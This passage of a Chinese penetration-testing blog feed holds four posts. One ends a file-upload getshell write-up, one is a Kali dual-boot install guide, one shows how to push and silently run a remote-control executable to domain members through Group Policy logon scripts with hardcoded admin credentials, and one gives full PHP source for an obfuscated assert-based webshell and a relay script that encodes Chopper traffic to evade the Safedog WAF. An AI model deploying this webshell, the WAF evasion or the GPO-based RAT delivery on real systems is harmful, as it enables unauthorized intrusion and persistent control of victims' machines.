<p>经测试，该上传点白名单无法绕过，遂放弃，另辟蹊径<br>
继续回头看<code>js</code>，函数<code>UpLoadPic</code>下还有函数<code>UpLoadFile</code></p>
<p><img src="comfun.js-upload.png" alt="comfun.js-upload"></p>
<p>同理构造表单上传，看到<code>档案格式不限</code>，感觉希望来了</p>
<p><img src="upload-post.png" alt="upload-post"></p>
<p>直接梭哈<code>asp</code></p>
<p><img src="upload-asp.png" alt="upload-asp"></p>
<p>哦豁，getshell！</p>
<p><img src="getshell.png" alt="getshell"></p>
<h2 id="0x04-总结"><a class="header-anchor" href="#0x04-总结">¶</a>0x04 总结</h2>
<p>该篇重点在于构造表单参数，在扫到一些上传页面无按钮时不要放弃，猜测参数有时能一击必杀<br>
另外<code>header</code>中<code>boundary=--------1036030574</code>不可缺少，表单分割线要保持一致<br>
至于后面的就是找对功能点，任意上传了。</p>
]]></content>
      <tags>
        <tag>上传</tag>
        <tag>getshell</tag>
      </tags>
  </entry>
  <entry>
    <title>双系统安装 - win7下安装kali2.0</title>
    <url>/2018/04/19/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E5%AE%89%E8%A3%85-win7%E4%B8%8B%E5%AE%89%E8%A3%85kali2-0/</url>
    <content><![CDATA[<h1>前言</h1>
<p>旧笔记本淘汰了，卖掉可惜，扔了更可惜，平时经常有破解wifi的需要，干脆把它做成双系统，win+linux两不误，由于我的华硕是UEFI+GPT，导致我双系统怎么都装不成功，由此开启了我崎岖的踩坑路。</p>
<h1>UEFI</h1>
<p>先恶补一波BIOS，MBR，UEFI，GPT</p>
<blockquote>
<p><a href="http://baijiahao.baidu.com/s?id=1571449106519556&amp;wfr=spider&amp;for=pc">还没弄明白BIOS+MBR和UEFI+GPT？看这一篇讲解就足够了！</a></p>
<p><a href="https://blog.csdn.net/mao0514/article/details/51162915">EFI、UEFI、MBR、GPT的区别</a></p>
<p><a href="https://www.zhihu.com/question/28471913">UEFI+GPT与BIOS+MBR各自有什么优缺点？</a></p>
</blockquote>
<p>看了这些应该有了一定的认识，一般组合为：</p>
<ul>
<li>UEFI + GPT</li>
<li>BIOS + MBR</li>
</ul>
<p>我2012年买的华硕，已经默认是UEFI+GPT，当时还因为这个原因导致无法重装系统，现在装双系统，又碰到该问题，简直头皮发麻，不管怎么说，目的得先达到——安装双系统win+kali2.0。</p>
<h1>步骤</h1>
<span id="more"></span>
<p>几乎翻遍了百度所有<em><strong>双系统</strong></em> 词条，都无法让我成功安装，除了 <em>rEFInd</em>，这个我没有尝试，因为界面实在太丑了。在尝试了将近3天的方法后，依然无果，甚至把win10换到了win7，还是不能成功。当我成功完成双系统的安装后，真的是心里mmp，脸上笑嘻嘻。总结如下：</p>
<p>技术问题查google！</p>
<p>技术问题查google！</p>
<p>技术问题查google！</p>
<p>三遍，你懂我意思。</p>
<blockquote>
<p><a href="http://linuxbsdos.com/2016/11/05/dual-boot-kali-linux-rolling-2016-2-windows-10-on-a-pc-with-uefi-firmware/">Dual-boot Kali Linux Rolling 2016.2, Windows 10 on a PC with UEFI firmware</a></p>
<p><a href="https://link.zhihu.com/?target=https%3A//www.youtube.com/watch%3Fv%3Dx7pDldI7tBY">视频操作</a></p>
</blockquote>
<h2 id="1-分区"><a class="header-anchor" href="#1-分区">¶</a>1. 分区</h2>
<p>压缩出50g，否则安装失败，由此在知乎上回答了该问题</p>
<p><a href="https://www.zhihu.com/question/39731926/answer/360816217">物理机安装kali linux时安装步骤失败？何解?</a></p>
<p>究其原因：</p>
<p>“/ 根目录” 要分10G以上(否则安装失败,x32和x64位的系统在两台电脑上面共尝试安装了10次左右没有成功,后来成功后总结出已知原因两点1,须选图形化安装2,手工分区,而且根目录足够大,此版本解压出来/根目录就7GB以上了)</p>
<h2 id="2-刻录"><a class="header-anchor" href="#2-刻录">¶</a>2. 刻录</h2>
<ul>
<li><em><strong>UltraISO</strong></em> ：刻录kali2.0后安装会出错</li>
<li><em><strong>Win32DiskImager</strong></em> ：可用，但是U盘会变成奇怪的格式，电脑无法打开，会提示格式化，失去了U盘的意义</li>
</ul>
<p>选用<em><strong>Rufus</strong></em> ，kali2.0可安装且U盘可用</p>
<h2 id="3-安装"><a class="header-anchor" href="#3-安装">¶</a>3. 安装</h2>
<p>一路往下走，分区时注意，选择<code>Guided - use the largest continuous free space</code> ，切忌不要使用手动分区，百度中所有安装kali的教程均选择手动</p>
<p>确认EFI系统分区后就可以done了</p>
<p>等待10分钟后，安装成功，否则失败参考第一步分区，<code>GNU GRUB</code>会被默认自动安装</p>
<p>重启后，bios设置启动项，默认进入win7，如需进入kali2.0，开机时<code>ESC</code>选择kali2.0即可（根据电脑决定，华硕为esc）</p>
<p>最后，晒张成功安装的图~</p>
<img src="/2018/04/19/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E5%AE%89%E8%A3%85-win7%E4%B8%8B%E5%AE%89%E8%A3%85kali2-0/finish-install_reboot_in_progress_0.png" class="">
]]></content>
      <tags>
        <tag>系统</tag>
      </tags>
  </entry>
  <entry>
    <title>域渗透 - 域控下发文件并执行远控</title>
    <url>/2018/03/01/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%9F%9F%E6%8E%A7%E4%B8%8B%E5%8F%91%E6%96%87%E4%BB%B6%E5%B9%B6%E6%89%A7%E8%A1%8C%E8%BF%9C%E6%8E%A7/</url>
    <content><![CDATA[<h1>0x01 背景</h1>
<p>内网渗透中，当控制到域控时，当然是再好不过，但如何控制成员机器或个人机呢，域管理员账号登录？太敏感，动作大；psexec,wmi…?杀软报毒，不要不信，亲身经历；</p>
<p>想要直接推送个远控，神不知鬼不觉的搞定成员；</p>
<p>那么问题来了，如何推送个exe？</p>
<h1>0x02 研究</h1>
<h2 id="方法1"><a class="header-anchor" href="#方法1">¶</a>方法1</h2>
<p>查找大量相关资料，都没有现成的方法直接下发exe，然而吐司竟然也没有，最后，锁定了<strong>组策略开机脚本</strong></p>
<p>域成员登录时，执行域控提前部署好的bat脚本，通过此脚本，IPC连接到域控，copy文件，在成员上执行。</p>
<span id="more"></span>
<p>环境：</p>
<table>
<thead>
<tr>
<th>OS</th>
<th>IP</th>
<th>Role</th>
</tr>
</thead>
<tbody>
<tr>
<td>win2008</td>
<td>192.168.2.100</td>
<td>域控</td>
</tr>
<tr>
<td>win7</td>
<td>192.168.2.200</td>
<td>域成员</td>
</tr>
<tr>
<td>ubuntu14.04</td>
<td>192.168.2.250</td>
<td>非域成员（cs）</td>
</tr>
</tbody>
</table>
<h3 id="1-ad用户和计算机"><a class="header-anchor" href="#1-ad用户和计算机">¶</a>(1) ad用户和计算机</h3>
<p>新建OU（名称任意）</p>
<p><img src="AD-01.png" alt="AD-01"></p>
<p>新建用户（redn3ck）</p>
<p><img src="AD-02.png" alt="AD-02"></p>
<h3 id="2-gpmc-msc组策略管理"><a class="header-anchor" href="#2-gpmc-msc组策略管理">¶</a>(2) gpmc.msc组策略管理</h3>
<p><code>gpmc.msc</code>——右键<em>组策略对象</em>——<em>新建（ADcontrol）</em></p>
<p><img src="AD-03.png" alt="AD-03"></p>
<p>右键<em>ADcontrol</em>——<em>编辑</em>——<em>用户配置</em>——<em>windows设置</em>——<em>脚本</em>——<em>登录</em>——<em>显示文件</em>——新建<em>ADControl.bat</em></p>
<p><img src="AD-04.png" alt="AD-04"></p>
<p>代码如下</p>
<figure class="highlight bat"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">net</span> use \\<span class="number">192</span>.<span class="number">168</span>.<span class="number">2</span>.<span class="number">100</span>  p@ssw0rd /user:administrator@red.com</span><br><span class="line"><span class="built_in">copy</span> \\<span class="number">192</span>.<span class="number">168</span>.<span class="number">2</span>.<span class="number">100</span>\c$\test\mm.exe c:\test\</span><br><span class="line"><span class="built_in">cmd</span> /c c:\test\mm.exe</span><br><span class="line"><span class="built_in">net</span> use * /<span class="built_in">del</span> /y</span><br></pre></td></tr></tbody></table></figure>
<p><em>添加</em>——<em>浏览</em>——选择<em>ADControl.bat</em></p>
<p><img src="AD-05.png" alt="AD-05"></p>
<p>右键<em>OU</em>——<em>链接现有GPO</em>——选择<em>ADcontrol</em></p>
<p><img src="AD-06.png" alt="AD-06"></p>
<h3 id="3-刷新策略"><a class="header-anchor" href="#3-刷新策略">¶</a>(3) 刷新策略</h3>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line">gpupdate /force</span><br></pre></td></tr></tbody></table></figure>
<p><img src="AD-07.png" alt="AD-07"></p>
<h3 id="4-重启域成员"><a class="header-anchor" href="#4-重启域成员">¶</a>(4) 重启域成员</h3>
<p>使用新建账户(redn3ck)登录，成功copy文件，并执行</p>
<p><img src="AD-08.png" alt="AD-08"></p>
<h2 id="方法2"><a class="header-anchor" href="#方法2">¶</a>方法2</h2>
<h3 id="1-创建bat"><a class="header-anchor" href="#1-创建bat">¶</a>(1) 创建bat</h3>
<p>logon默认路径：<code>C:\Windows\SYSVOL\sysvol\red.com\scripts</code></p>
<figure class="highlight bat"><table><tbody><tr><td class="code"><pre><span class="line">//logon.bat</span><br><span class="line"></span><br><span class="line"><span class="built_in">net</span> use \\<span class="number">192</span>.<span class="number">168</span>.<span class="number">2</span>.<span class="number">100</span> <span class="number">12345</span>RDzxcvb! /user:administrator@red.com</span><br><span class="line"><span class="built_in">copy</span> \\<span class="number">192</span>.<span class="number">168</span>.<span class="number">2</span>.<span class="number">100</span>\c$\test\mm.exe c:\test</span><br><span class="line"><span class="built_in">cmd</span> /c <span class="built_in">start</span> c:\test\mm.exe</span><br></pre></td></tr></tbody></table></figure>
<h3 id="2-执行"><a class="header-anchor" href="#2-执行">¶</a>(2) 执行</h3>
<figure class="highlight bat"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">net</span> user redn3ck /scriptpath:logon.bat</span><br></pre></td></tr></tbody></table></figure>
<p><font color="red">注：执行时需要<code>cmd /c start</code>否则开机会有cmd窗口 </font></p>
<h2 id="方法3"><a class="header-anchor" href="#方法3">¶</a>方法3</h2>
<p><em>Domain computer</em>——<em>管理</em>——<em>添加用户到远程管理组</em></p>
<h1>0x03 总结</h1>
<ol>
<li>
<p>脚本需要放在*《显示文件》*目录中，其他目录成员机无法访问到，因此也就无法执行</p>
</li>
<li>
<p>域用户（redn3ck）在根目录均无权限，<code>windows\temp</code>目录可copy进去，但无法执行，因此copy时需选择有权限目录</p>
</li>
<li>
<p>实际环境中当然不能重启机器，只需要等待域成员账号开机登录即可</p>
</li>
</ol>
]]></content>
      <tags>
        <tag>域渗透</tag>
      </tags>
  </entry>
  <entry>
    <title>安全狗绕过 - 本地中转bypass</title>
    <url>/2018/07/22/%E5%AE%89%E5%85%A8%E7%8B%97%E7%BB%95%E8%BF%87-%E6%9C%AC%E5%9C%B0%E4%B8%AD%E8%BD%ACbypass/</url>
    <content><![CDATA[<h1>前言</h1>
<p>若服务器安装了安全狗，普通一句话安全狗肯定拦截，菜刀必然无法使用。</p>
<p>究其原因：菜刀请求关键字等被安全狗识别导致中断请求。</p>
<p>构造本地中转脚本，本地服务器发送请求，对菜刀请求关键字进行编码，服务端再对请求解码，这样安全狗无法识别也就无法拦截请求。</p>
<h1>客户端</h1>
<p>客户端即中转脚本<code>transfer.php</code></p>
<p>客户端对菜刀请求参数进行编码操作，此处仅做简单编码验证bypass，编码顺序依次为</p>
<span id="more"></span>
<blockquote>
<p><code>base64_encode()</code>,<br>
<code>str_rot13()</code>,<br>
<code>strrev()</code>,<br>
<code>base64_encode()</code></p>
</blockquote>
<p>经过这4层编码，对服务端发送请求。</p>
<figure class="highlight php"><figcaption><span>客户端：transfer.php</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">encode</span>(<span class="params"><span class="variable">$str</span></span>)</span>{</span><br><span class="line">	<span class="variable">$DS</span> = <span class="title function_ invoke__">base64_encode</span>(<span class="variable">$str</span>);</span><br><span class="line">	<span class="variable">$DS</span> = <span class="title function_ invoke__">str_rot13</span>(<span class="variable">$DS</span>);</span><br><span class="line">	<span class="variable">$DS</span> = <span class="title function_ invoke__">strrev</span>(<span class="variable">$DS</span>);</span><br><span class="line">	<span class="variable">$DS</span> = <span class="title function_ invoke__">base64_encode</span>(<span class="variable">$DS</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="variable">$DS</span>;</span><br><span class="line">	}</span><br><span class="line">	<span class="comment">// webshell地址，transServ.php为定制一句话</span></span><br><span class="line">	<span class="variable">$webshell</span> = <span class="string">'http://127.0.0.1/transServ.php'</span>;</span><br><span class="line">	<span class="variable">$pdata</span> = <span class="variable">$_POST</span>;</span><br><span class="line">	<span class="keyword">foreach</span>(<span class="variable">$pdata</span> <span class="keyword">as</span> <span class="variable">$key</span>=&gt;<span class="variable">$value</span>){ </span><br><span class="line">		<span class="keyword">if</span>(<span class="title function_ invoke__">is_array</span>(<span class="variable">$value</span>)){</span><br><span class="line">			<span class="variable">$value</span>=<span class="title function_ invoke__">implode</span>(<span class="variable">$value</span>);</span><br><span class="line">		}</span><br><span class="line">		<span class="comment">// 菜刀密码</span></span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$key</span> == <span class="string">'pass'</span>) {</span><br><span class="line">			<span class="variable">$pdata</span>[<span class="variable">$key</span>] = <span class="title function_ invoke__">encode</span>(<span class="variable">$value</span>);</span><br><span class="line">		}</span><br><span class="line">		</span><br><span class="line">	}</span><br><span class="line">	<span class="comment">// var_dump($pdata);</span></span><br><span class="line">	<span class="variable">$data</span> = <span class="title function_ invoke__">http_build_query</span>(<span class="variable">$pdata</span>);</span><br><span class="line">	</span><br><span class="line">	<span class="variable">$opts</span> = <span class="keyword">array</span> (</span><br><span class="line">		<span class="string">'http'</span> =&gt; <span class="keyword">array</span> (</span><br><span class="line">		<span class="string">'method'</span> =&gt; <span class="string">'POST'</span>,</span><br><span class="line">		<span class="string">'header'</span>=&gt; <span class="string">"Content-type: application/x-www-form-urlencoded\r\n"</span> . <span class="string">"Content-Length: "</span> . <span class="title function_ invoke__">strlen</span>(<span class="variable">$data</span>) . <span class="string">"\r\n"</span>,</span><br><span class="line">		<span class="string">'content'</span> =&gt; <span class="variable">$data</span>)</span><br><span class="line">	);</span><br><span class="line">	<span class="variable">$context</span> = <span class="title function_ invoke__">stream_context_create</span>(<span class="variable">$opts</span>);</span><br><span class="line">	<span class="comment">// 创建资源流上下文,数据包</span></span><br><span class="line">	<span class="variable">$html</span> = @<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$webshell</span>, <span class="literal">false</span>, <span class="variable">$context</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$html</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<h1>服务端</h1>
<p>服务端只需对请求进行解码操作，然后正常使用菜刀一句话即可，解码顺序依次为</p>
<blockquote>
<p><code>base64_decode()</code>,<br>
<code>str_rot13()</code>,<br>
<code>strrev()</code>,<br>
<code>base64_decode()</code></p>
</blockquote>
<p>此处使用<code>array_map()</code>回调后门，为保证新旧菜刀均可使用</p>
<blockquote>
<p>版本需求：<code>php&gt;5.2</code></p>
</blockquote>
<figure class="highlight php"><figcaption><span>服务端：transServ.php</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="variable">$DS</span> = @$<span class="comment">/*-*/</span>{<span class="string">"_P"</span>.<span class="string">"OST"</span>}[<span class="string">'pass'</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$DS</span>) ){</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$DS</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">	<span class="variable">$DS</span> = @<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$DS</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$DS</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">	<span class="variable">$DS</span> = @<span class="title function_ invoke__">strrev</span>(<span class="variable">$DS</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$DS</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">	<span class="variable">$DS</span> = @<span class="title function_ invoke__">str_rot13</span>(<span class="variable">$DS</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$DS</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">	<span class="variable">$DS</span> = @<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$DS</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$DS</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">	@<span class="title function_ invoke__">array_map</span>(assert,(<span class="keyword">array</span>)<span class="variable">$DS</span>);</span><br><span class="line">	<span class="keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<h1>连接</h1>
<h2 id="浏览器验证"><a class="header-anchor" href="#浏览器验证">¶</a>浏览器验证</h2>
<p><img src="phpinfo.png" alt="phpinfo"></p>
<h2 id="菜刀连接"><a class="header-anchor" href="#菜刀连接">¶</a>菜刀连接</h2>
<p>连接本地中转脚本，中转脚本对webshell发送编码后请求。</p>
<p><img src="caidao.png" alt="caidao"></p>
<h2 id="bypass安全狗"><a class="header-anchor" href="#bypass安全狗">¶</a>bypass安全狗</h2>
<p><img src="bypass-safedog.png" alt="bypass-safedog"><br>
<img src="bypass-caidao.png" alt="bypass-caidao"></p>
]]></content>
      <tags>
        <tag>安全狗</tag>
        <tag>绕过</tag>
        <tag>bypass</tag>
      </tags>
  </entry>
</search>